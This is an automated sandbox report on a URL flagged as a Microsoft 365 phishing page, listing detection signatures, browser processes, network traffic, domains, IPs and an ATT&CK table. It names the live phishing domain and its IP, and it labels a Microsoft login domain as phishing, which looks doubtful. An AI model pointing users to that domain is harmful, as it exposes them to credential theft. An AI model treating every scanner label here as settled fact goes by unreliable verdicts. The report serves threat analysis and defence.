Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://jkqbjwq.maxiite.com

Overview

General Information

Sample URL:https://jkqbjwq.maxiite.com
Analysis ID:1580031
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected suspicious Javascript
Form action URLs do not match main URL
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML title does not match URL

Classification

  • System is w7x64
  • chrome.exe (PID: 492 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 300 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1248,i,18209298034698684818,12563364091482857980,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • chrome.exe (PID: 1412 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://jkqbjwq.maxiite.com" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_376JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.0.id.script.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://jkqbjwq.maxiite.comAvira URL Cloud: detection malicious, Label: phishing
      Source: https://jkqbjwq.maxiite.com/Avira URL Cloud: Label: phishing
      Source: https://login.microsoftonline.deAvira URL Cloud: Label: phishing

      Phishing

      barindex
      Source: Yara matchFile source: 0.0.id.script.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_376, type: DROPPED
      Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jkqbjwq.maxiite.com/... This script exhibits several high-risk behaviors, including dynamic code execution through the use of `eval()` and obfuscated code. It also attempts to redirect the user to a domain other than 'google.com', which is a strong indicator of malicious intent. The script appears to be attempting to execute remote or dynamically generated code, which poses a significant security risk. Overall, this script demonstrates a high level of suspicious and potentially malicious activity.
      Source: https://www.bing.com/search?q=officeHTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=abfad05d-9a76-4d44-8534-216d99737b62&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2233097A094B7E4685822C3A3929157F3C%22%7d&sso_reload=true bing microsoftonline
      Source: https://www.bing.com/search?q=officeHTTP Parser: Number of links: 0
      Source: https://www.bing.com/search?q=officeHTTP Parser: Total embedded image size: 26001
      Source: https://www.bing.com/search?q=officeHTTP Parser: Title: Redirecting does not match URL
      Source: https://www.office.com/HTTP Parser: Title: Login | Microsoft 365 does not match URL
      Source: https://www.bing.com/search?q=officeHTTP Parser: No favicon
      Source: https://www.bing.com/search?q=officeHTTP Parser: No favicon
      Source: https://www.bing.com/search?q=officeHTTP Parser: No <meta name="author".. found
      Source: https://www.office.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.bing.com/search?q=officeHTTP Parser: No <meta name="copyright".. found
      Source: https://www.office.com/HTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\GoogleJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_492_173025682Jump to behavior
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: jkqbjwq.maxiite.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1Host: mem.gfx.msConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.office.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1Host: mem.gfx.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"Origin: https://www.office.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.office.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chromecache_411.1.dr, chromecache_320.1.drString found in binary or memory: 26" data-priority="2"><div class="na_card_wrp na_ccw_wrp" data-priority="2"><a class="na_ccw tc r_img" url="https://www.yahoo.com/tech/own-whole-microsoft-office-suite-050000231.html" data-priority="2" titletext="Own the whole Microsoft Office suite for life for just equals www.yahoo.com (Yahoo)
      Source: chromecache_411.1.dr, chromecache_320.1.drString found in binary or memory: 26" href="https://www.yahoo.com/tech/own-whole-microsoft-office-suite-050000231.html" h="ID=NEWS.401_0,5053.1"><div class="citm_img"><div class="imagewrap"><img title="Own the whole Microsoft Office suite for life for just equals www.yahoo.com (Yahoo)
      Source: chromecache_411.1.dr, chromecache_320.1.drString found in binary or memory: get the lifetime version that pays for itself</div></div></a></div></div><div class="na_cai" url="https://www.yahoo.com/tech/own-whole-microsoft-office-suite-050000231.html" titletext="Own the whole Microsoft Office suite for life for just equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: jkqbjwq.maxiite.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.office.com
      Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
      Source: global trafficDNS traffic detected: DNS query: outlook.office.com
      Source: global trafficDNS traffic detected: DNS query: portal.office.com
      Source: global trafficDNS traffic detected: DNS query: substrate.office.com
      Source: global trafficDNS traffic detected: DNS query: mem.gfx.ms
      Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
      Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
      Source: global trafficDNS traffic detected: DNS query: services.bingapis.com
      Source: unknownHTTP traffic detected: POST /report/v4?s=UUaZ%2FHZfFyQVvb3r%2Fd0zCUCc6VTBRokIpiY89p5q3jNwkzgygg7taaKsBub10Zqq0GrUihLAcZQhlkJhISGUeC%2Fj24RxHJQh%2Bw5SF7OXoEo3ZWmiXG1s8NMu9GWMK34BL1OHlhop HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 390Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chromecache_348.1.dr, chromecache_360.1.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
      Source: chromecache_247.1.drString found in binary or memory: https://3pcookiecheck.azureedge.net
      Source: chromecache_508.1.dr, chromecache_291.1.drString found in binary or memory: https://github.com/zloirock/core-js
      Source: chromecache_508.1.dr, chromecache_291.1.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.37.1/LICENSE
      Source: chromecache_417.1.drString found in binary or memory: https://login.chinacloudapi.cn
      Source: chromecache_417.1.drString found in binary or memory: https://login.microsoftonline.com
      Source: chromecache_417.1.drString found in binary or memory: https://login.microsoftonline.de
      Source: chromecache_417.1.drString found in binary or memory: https://login.microsoftonline.us
      Source: chromecache_417.1.drString found in binary or memory: https://login.windows-ppe.net
      Source: chromecache_247.1.drString found in binary or memory: https://portal.office.com
      Source: chromecache_247.1.drString found in binary or memory: https://portal.office.com/adminportal/home
      Source: chromecache_349.1.dr, chromecache_379.1.drString found in binary or memory: https://services.bingapis.com/favicon/?url=
      Source: chromecache_320.1.drString found in binary or memory: https://www.bloomberg.com/news/articles/2024-12-12/amazon-paused-rollout-of-microsoft-office-for-a-y
      Source: chromecache_247.1.drString found in binary or memory: https://www.geekwire.com/2024/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-tota
      Source: chromecache_320.1.drString found in binary or memory: https://www.maketecheasier.com/create-microsoft-passkey/
      Source: chromecache_247.1.drString found in binary or memory: https://www.msn.com/en-in/entertainment/southcinema/pushpa-2-box-office-collection-day-18-allu-arjun
      Source: chromecache_247.1.drString found in binary or memory: https://www.msn.com/en-in/entertainment/southcinema/pushpa-2-the-rule-box-office-collection-the-allu
      Source: chromecache_247.1.drString found in binary or memory: https://www.msn.com/en-us/lifestyle/shopping/this-free-microsoft-office-alternative-has-just-as-many
      Source: chromecache_411.1.dr, chromecache_320.1.drString found in binary or memory: https://www.msn.com/en-us/money/other/amazon-paused-rollout-of-microsoft-office-for-a-year-after-hac
      Source: chromecache_247.1.drString found in binary or memory: https://www.msn.com/en-us/money/other/apple-targets-new-miami-office-space-following-amazon-microsof
      Source: chromecache_411.1.dr, chromecache_320.1.drString found in binary or memory: https://www.msn.com/en-us/money/other/skip-the-subscription-drama-and-own-office-2019-forever/ar-AA1
      Source: chromecache_247.1.drString found in binary or memory: https://www.msn.com/en-us/movies/news/8-huge-box-office-disappointments-in-hollywood-history/ss-BB1m
      Source: chromecache_247.1.drString found in binary or memory: https://www.msn.com/en-us/news/technology/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-
      Source: chromecache_247.1.drString found in binary or memory: https://www.office.com
      Source: chromecache_247.1.drString found in binary or memory: https://www.office.com/?omkt=en-001
      Source: chromecache_247.1.drString found in binary or memory: https://www.office.com/caplogin
      Source: chromecache_320.1.drString found in binary or memory: https://www.pcworld.com/article/2553754/skip-the-subscription-drama-and-own-office-2019-forever.html
      Source: chromecache_320.1.drString found in binary or memory: https://www.popsci.com/sponsored-content/microsoft-office-permanent-license-sponsored-deal/
      Source: chromecache_320.1.drString found in binary or memory: https://www.seattletimes.com/business/microsoft/heres-how-microsoft-is-tracking-in-office-work/
      Source: chromecache_320.1.drString found in binary or memory: https://www.yahoo.com/tech/own-whole-microsoft-office-suite-050000231.html
      Source: unknownNetwork traffic detected: HTTP traffic on port 49517 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49517
      Source: classification engineClassification label: mal68.phis.win@24/516@34/5
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\GoogleJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1248,i,18209298034698684818,12563364091482857980,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://jkqbjwq.maxiite.com"
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1248,i,18209298034698684818,12563364091482857980,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\GoogleJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
      Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_492_173025682Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      2
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://jkqbjwq.maxiite.com100%Avira URL Cloudphishing
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://jkqbjwq.maxiite.com/100%Avira URL Cloudphishing
      https://login.microsoftonline.de100%Avira URL Cloudphishing
      NameIPActiveMaliciousAntivirus DetectionReputation
      ooc-g2.tm-4.office.com
      52.98.32.2
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          www.google.com
          172.217.17.36
          truefalse
            high
            jkqbjwq.maxiite.com
            172.67.210.5
            truetrue
              unknown
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                DOH-efz.ms-acdc.office.com
                40.99.27.2
                truefalse
                  high
                  js.monitor.azure.com
                  unknown
                  unknownfalse
                    high
                    www.office.com
                    unknown
                    unknownfalse
                      high
                      services.bingapis.com
                      unknown
                      unknownfalse
                        high
                        outlook.office.com
                        unknown
                        unknownfalse
                          high
                          substrate.office.com
                          unknown
                          unknownfalse
                            high
                            login.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              portal.office.com
                              unknown
                              unknownfalse
                                high
                                m365cdn.nel.measure.office.net
                                unknown
                                unknownfalse
                                  high
                                  mem.gfx.ms
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://www.office.com/false
                                      high
                                      https://mem.gfx.ms/meversion?partner=office&market=en-us&uhf=1false
                                        high
                                        https://a.nel.cloudflare.com/report/v4?s=UUaZ%2FHZfFyQVvb3r%2Fd0zCUCc6VTBRokIpiY89p5q3jNwkzgygg7taaKsBub10Zqq0GrUihLAcZQhlkJhISGUeC%2Fj24RxHJQh%2Bw5SF7OXoEo3ZWmiXG1s8NMu9GWMK34BL1OHlhopfalse
                                          high
                                          https://jkqbjwq.maxiite.com/true
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.jsfalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.msn.com/en-us/money/other/skip-the-subscription-drama-and-own-office-2019-forever/ar-AA1chromecache_411.1.dr, chromecache_320.1.drfalse
                                              high
                                              https://www.office.com/?omkt=en-001chromecache_247.1.drfalse
                                                high
                                                https://www.bloomberg.com/news/articles/2024-12-12/amazon-paused-rollout-of-microsoft-office-for-a-ychromecache_320.1.drfalse
                                                  high
                                                  https://www.office.comchromecache_247.1.drfalse
                                                    high
                                                    https://www.office.com/caploginchromecache_247.1.drfalse
                                                      high
                                                      https://github.com/zloirock/core-jschromecache_508.1.dr, chromecache_291.1.drfalse
                                                        high
                                                        https://www.geekwire.com/2024/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-startup-totachromecache_247.1.drfalse
                                                          high
                                                          https://portal.office.com/adminportal/homechromecache_247.1.drfalse
                                                            high
                                                            https://login.chinacloudapi.cnchromecache_417.1.drfalse
                                                              high
                                                              https://login.windows-ppe.netchromecache_417.1.drfalse
                                                                high
                                                                https://www.msn.com/en-us/money/other/apple-targets-new-miami-office-space-following-amazon-microsofchromecache_247.1.drfalse
                                                                  high
                                                                  https://www.msn.com/en-us/movies/news/8-huge-box-office-disappointments-in-hollywood-history/ss-BB1mchromecache_247.1.drfalse
                                                                    high
                                                                    https://login.microsoftonline.uschromecache_417.1.drfalse
                                                                      high
                                                                      https://www.msn.com/en-in/entertainment/southcinema/pushpa-2-the-rule-box-office-collection-the-alluchromecache_247.1.drfalse
                                                                        high
                                                                        https://login.microsoftonline.comchromecache_417.1.drfalse
                                                                          high
                                                                          https://www.maketecheasier.com/create-microsoft-passkey/chromecache_320.1.drfalse
                                                                            high
                                                                            https://www.seattletimes.com/business/microsoft/heres-how-microsoft-is-tracking-in-office-work/chromecache_320.1.drfalse
                                                                              high
                                                                              https://www.msn.com/en-us/money/other/amazon-paused-rollout-of-microsoft-office-for-a-year-after-hacchromecache_411.1.dr, chromecache_320.1.drfalse
                                                                                high
                                                                                https://portal.office.comchromecache_247.1.drfalse
                                                                                  high
                                                                                  https://www.msn.com/en-in/entertainment/southcinema/pushpa-2-box-office-collection-day-18-allu-arjunchromecache_247.1.drfalse
                                                                                    high
                                                                                    https://www.yahoo.com/tech/own-whole-microsoft-office-suite-050000231.htmlchromecache_320.1.drfalse
                                                                                      high
                                                                                      https://www.popsci.com/sponsored-content/microsoft-office-permanent-license-sponsored-deal/chromecache_320.1.drfalse
                                                                                        high
                                                                                        https://services.bingapis.com/favicon/?url=chromecache_349.1.dr, chromecache_379.1.drfalse
                                                                                          high
                                                                                          http://github.com/requirejs/almond/LICENSEchromecache_348.1.dr, chromecache_360.1.drfalse
                                                                                            high
                                                                                            https://github.com/zloirock/core-js/blob/v3.37.1/LICENSEchromecache_508.1.dr, chromecache_291.1.drfalse
                                                                                              high
                                                                                              https://www.pcworld.com/article/2553754/skip-the-subscription-drama-and-own-office-2019-forever.htmlchromecache_320.1.drfalse
                                                                                                high
                                                                                                https://login.microsoftonline.dechromecache_417.1.drfalse
                                                                                                • Avira URL Cloud: phishing
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/lifestyle/shopping/this-free-microsoft-office-alternative-has-just-as-manychromecache_247.1.drfalse
                                                                                                  high
                                                                                                  https://www.msn.com/en-us/news/technology/early-microsoft-leaders-go-all-in-on-ai-with-seattle-area-chromecache_247.1.drfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    35.190.80.1
                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    172.67.210.5
                                                                                                    jkqbjwq.maxiite.comUnited States
                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                    172.217.17.36
                                                                                                    www.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    239.255.255.250
                                                                                                    unknownReserved
                                                                                                    unknownunknownfalse
                                                                                                    IP
                                                                                                    192.168.2.4
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1580031
                                                                                                    Start date and time:2024-12-23 18:42:35 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 3m 55s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                    Sample URL:https://jkqbjwq.maxiite.com
                                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                    Number of analysed new started processes analysed:4
                                                                                                    Number of new started drivers analysed:2
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Detection:MAL
                                                                                                    Classification:mal68.phis.win@24/516@34/5
                                                                                                    • Exclude process from analysis (whitelisted): vga.dll, WMIADAP.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 172.217.19.195, 74.125.71.84, 172.217.17.46, 172.217.19.238, 95.100.170.147, 95.100.170.64, 95.100.170.186, 95.100.170.138, 95.100.170.139, 95.100.170.170, 95.100.170.155, 95.100.170.169, 95.100.170.72, 95.100.170.200, 95.100.170.177, 95.100.170.184, 95.100.170.218, 95.100.170.217, 95.100.170.67, 95.100.170.201, 95.100.170.216, 95.100.170.153, 95.100.170.145, 95.100.170.146, 13.107.6.156, 20.223.36.55, 2.16.158.169, 2.16.158.170, 2.16.158.88, 23.195.61.233, 20.20.44.224, 20.20.44.97, 20.20.44.160, 40.126.53.16, 40.126.53.17, 20.231.128.66, 40.126.53.8, 40.126.53.7, 40.126.53.15, 40.126.53.19, 20.231.128.67, 52.109.88.188, 104.83.143.131, 95.100.170.185, 2.16.158.187, 2.16.158.184, 2.16.158.75, 2.16.158.171, 2.16.158.192, 142.250.181.99, 34.104.35.123, 20.190.147.2, 20.190.177.22, 20.190.177.20, 20.190.147.7, 20.190.147.3, 20.190.147.12, 20.190.147.1, 20.190.177.84, 95.100.170.59, 95.100.170.49, 95.100.170.211, 13.107.5.80, 95.100.170.168, 95.100.170.163, 95.100.170.16
                                                                                                    • Excluded domains from analysis (whitelisted): europe.ocws1.live.com.akadns.net, www-bing-com.dual-a-0034.a-msedge.net, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, p-static.bing.trafficmanager.net, ak.privatelink.msidentity.com, prod.ocws1.live.com.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, e86303.dscx.akamaiedge.net, star-azurefd-prod.trafficmanager.net, login.live.com, shell.cdn.office.net, update.googleapis.com, 3pcookiecheck.afd.azureedge.net, ags.privatelink.msidentity.com, www.bing.com, san-ion.secure4.scene7.com.edgekey.net, e40491.dscg.akamaiedge.net, www.tm.prd.ags.akadns.net, aadcdnoriginwus2.azureedge.net, portal-office365-com.b-0004.b-msedge.net, e19254.dscg.akamaiedge.net, aadcdn.msauth.net, www-www.bing.com.trafficmanager.net, shell.cdn.office.net-c.edgekey.net.globalredir.akadns.net, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, amcdnmsftuswe.azureedge.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, owamail.public.c
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • VT rate limit hit for: https://jkqbjwq.maxiite.com
                                                                                                    No simulations
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
